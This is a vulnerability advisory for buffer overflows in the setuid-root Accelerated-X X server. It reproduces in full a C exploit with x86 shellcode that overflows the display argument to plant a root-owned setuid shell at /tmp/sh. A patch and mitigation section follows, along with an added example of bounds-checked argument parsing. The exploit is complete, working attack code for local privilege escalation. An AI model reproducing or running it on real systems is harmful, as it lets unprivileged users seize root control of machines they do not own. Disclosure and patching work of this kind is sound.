Vulnerability: Accelerated-X
Affected: Unices (Linux, FreeBSD, Solaris/x86, SCO)

Description

The following is based on KSR[T] Advisory #011. Local users can gain administrative privileges by exploiting multiple buffer overflows (stack overwrites) in the Accelerated-X X server. Accelerated-X Server is a commercial X server available from http://www.xig.com/. By default, the X server is installed setuid root so that, when it is executed by a user, it still retains enough privilege to load drivers, manipulate the display, and log information. However, because the server does not bounds-check its command-line parameters, an attacker can overflow it by specifying a 48-byte display string, or by passing a long string through the -query command-line parameter. Local users who can execute the Accelerated-X X server can obtain root privileges. (KSR[T] would like to thank Chris Evans for pointing out the -query buffer overflow as well as additional security holes relating to command-line parameters.)

Here is the exploit for the Accelerated-X buffer overflow. c0nd0r checked the '-query' argument and found that it does not overwrite the return address, so that parameter cannot be exploited this way. The '-indirect' argument behaves in the same way.

/*
 * SDI linux exploit for Accelerated-X
 * Sekure SDI - Brazilian Information Security Team
 * by c0nd0r <condor@sekure.org>
 *
 * This script will exploit a vulnerability found by KSRT team
 * in the Accelerated-X Xserver [<=5.0].
 *
 * --------------------------------------------------------------------
 * The vulnerable buffer was small so we've changed the usual order to:
 *   [garbage][eip][lots nop][shellcode]
 * BTW, I've also changed the code to execute, it will create a setuid
 * shell owned by the superuser at /tmp/sh.
 * --------------------------------------------------------------------
 *
 * Warning: DO NOT USE THIS TOOL FOR ILLICIT ACTIVITIES! We take no
 * responsibility.
 *
 * Greets to jamez, bishop, bahamas, stderr, dumped, paranoia,
 * marty (NORDO!), vader, fcon, slide, c_orb and
 * specially to my sasazita. Also toxyn.org, pulhas.org,
 * superbofh.org (Phibernet rox) and el8.org.
 *
 * Laughs - lame guys who hacked the senado/planalto.gov.br
 * pay some attention to the site: securityfocus.com (good point).
 * see you at #uground (irc.brasnet.org)
 */

#include <stdio.h>
#include <stdlib.h>     /* atoi */
#include <string.h>     /* strlen */
#include <unistd.h>     /* execl */

/* generic shellcode: execve("/bin/sh", ["/bin/sh", "-c", "cp ...; chmod ..."]) */
char shellcode[] =
    "\xeb\x31\x5e\x89\x76\x32\x8d\x5e\x08\x89\x5e\x36"
    "\x8d\x5e\x0b\x89\x5e\x3a\x31\xc0\x88\x46\x07\x88"
    "\x46\x0a\x88\x46\x31\x89\x46\x3e\xb0\x0b\x89\xf3"
    "\x8d\x4e\x32\x8d\x56\x3e\xcd\x80\x31\xdb\x89\xd8"
    "\x40\xcd\x80\xe8\xca\xff\xff\xff"
    "/bin/sh -c cp /bin/sh /tmp/sh; chmod 6755 /tmp/sh";

int main(int argc, char *argv[])
{
    char buf[1024];
    int x, y, offset = 1000;
    long addr;
    int joe;

    /* optional first argument adjusts the guessed stack offset */
    if (argc > 1)
        offset = atoi(argv[1]);

    /* return address: a stack address near this frame plus the offset */
    addr = (long) &joe + offset;

    /* the argument is passed as a display string, so it starts with ':' */
    buf[0] = ':';

    /* [garbage] filling the small vulnerable buffer */
    for (x = 1; x < 53; x++)
        buf[x] = 'X';

    /* [eip] little-endian return address */
    buf[x++] = (addr & 0x000000ff);
    buf[x++] = (addr & 0x0000ff00) >> 8;
    buf[x++] = (addr & 0x00ff0000) >> 16;
    buf[x++] = (addr & 0xff000000) >> 24;

    /* [lots nop] NOP sled */
    for ( ; x < 500; x++)
        buf[x] = 0x90;

    /* [shellcode] */
    for (y = 0; y < strlen(shellcode); y++, x++)
        buf[x] = shellcode[y];
    buf[x] = '\0';              /* terminate the argument string */

    fprintf(stderr, "\nSDI Xaccel - Offset: %d | Addr: 0x%lx\n\n", offset, addr);

    execl("/usr/X11R6/bin/Xaccel", "Xaccel", buf, (char *)0);
    // setenv ( "EGG", buf, 1);
    // system ( "/bin/sh");
    return 0;
}

Solution

For AccelX 5.x: XiG has made a patch available for 5.0.1 which corrects these and other potential command-line interface security holes. Users running 5.0.0 have to apply the 5.0.1 patch prior to applying the 5.0.2 patch. The patch is available at ftp://ftp.xig.com/pub/updates.

For AccelX 4.x: A patch will be made available shortly. An interim solution is to use an X server wrapper, or to limit access to the Xaccel binary via a special group.
The upcoming release of Maximum CDE 2.1 comes with the 5.0.2 X Server, and is not vulnerable to these attacks.
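The missing bounds check the advisory describes, shown as an added example that is not part of the advisory or of XiG's code: argument values for the display string and for -query are copied into fixed stack buffers only after their length has been compared with the destination size, and anything that does not fit is rejected. The 48-byte display buffer reuses the advisory's figure; HOST_BUF_LEN, the function names and the exact set of options handled are assumptions for illustration.

```c
#include <string.h>

/* Illustrative sizes, not values from the Xaccel source; 48 is the display
 * string length the advisory reports as enough to overflow the server. */
#define DISPLAY_BUF_LEN 48
#define HOST_BUF_LEN    64
/* Vulnerable pattern for comparison (never called):
 *     strcpy(display, argv[i]);   // no length check, runs past 'display' */

/* Bounded copy that fails closed: refuse an argument that would not fit
 * together with its terminating NUL. Returns 0 on success, -1 otherwise. */
static int copy_bounded(char *dst, size_t dstlen, const char *arg)
{
    size_t n = strlen(arg);            /* argv strings are NUL-terminated */
    if (n >= dstlen)
        return -1;
    memcpy(dst, arg, n + 1);
    return 0;
}

/* A display argument must look like ":N" or ":N.S" with N and S decimal. */
static int valid_display(const char *arg)
{
    return arg[0] == ':' && arg[1] != '\0' &&
           arg[1 + strspn(arg + 1, "0123456789.")] == '\0';
}

/* Handles only the two parameters named in the advisory; one rejected
 * argument fails the whole command line so the server can exit early. */
int parse_server_args(int argc, char **argv, char *display, size_t dlen,
                      char *host, size_t hlen)
{
    for (int i = 1; i < argc; i++) {
        if (strcmp(argv[i], "-query") == 0) {
            if (i + 1 >= argc || copy_bounded(host, hlen, argv[++i]) != 0)
                return -1;
        } else if (!valid_display(argv[i]) ||
                   copy_bounded(display, dlen, argv[i]) != 0) {
            return -1;                 /* anything else must be a valid display */
        }
    }
    return 0;
}

/* Self-check helper: run the parser on one or two constructed arguments. */
int accept_args(const char *arg1, const char *arg2)
{
    char d[DISPLAY_BUF_LEN] = "", h[HOST_BUF_LEN] = "";
    char *argv[] = {"Xaccel", (char *)arg1, (char *)arg2, NULL};
    return parse_server_args(arg2 ? 3 : 2, argv, d, sizeof d, h, sizeof h);
}
```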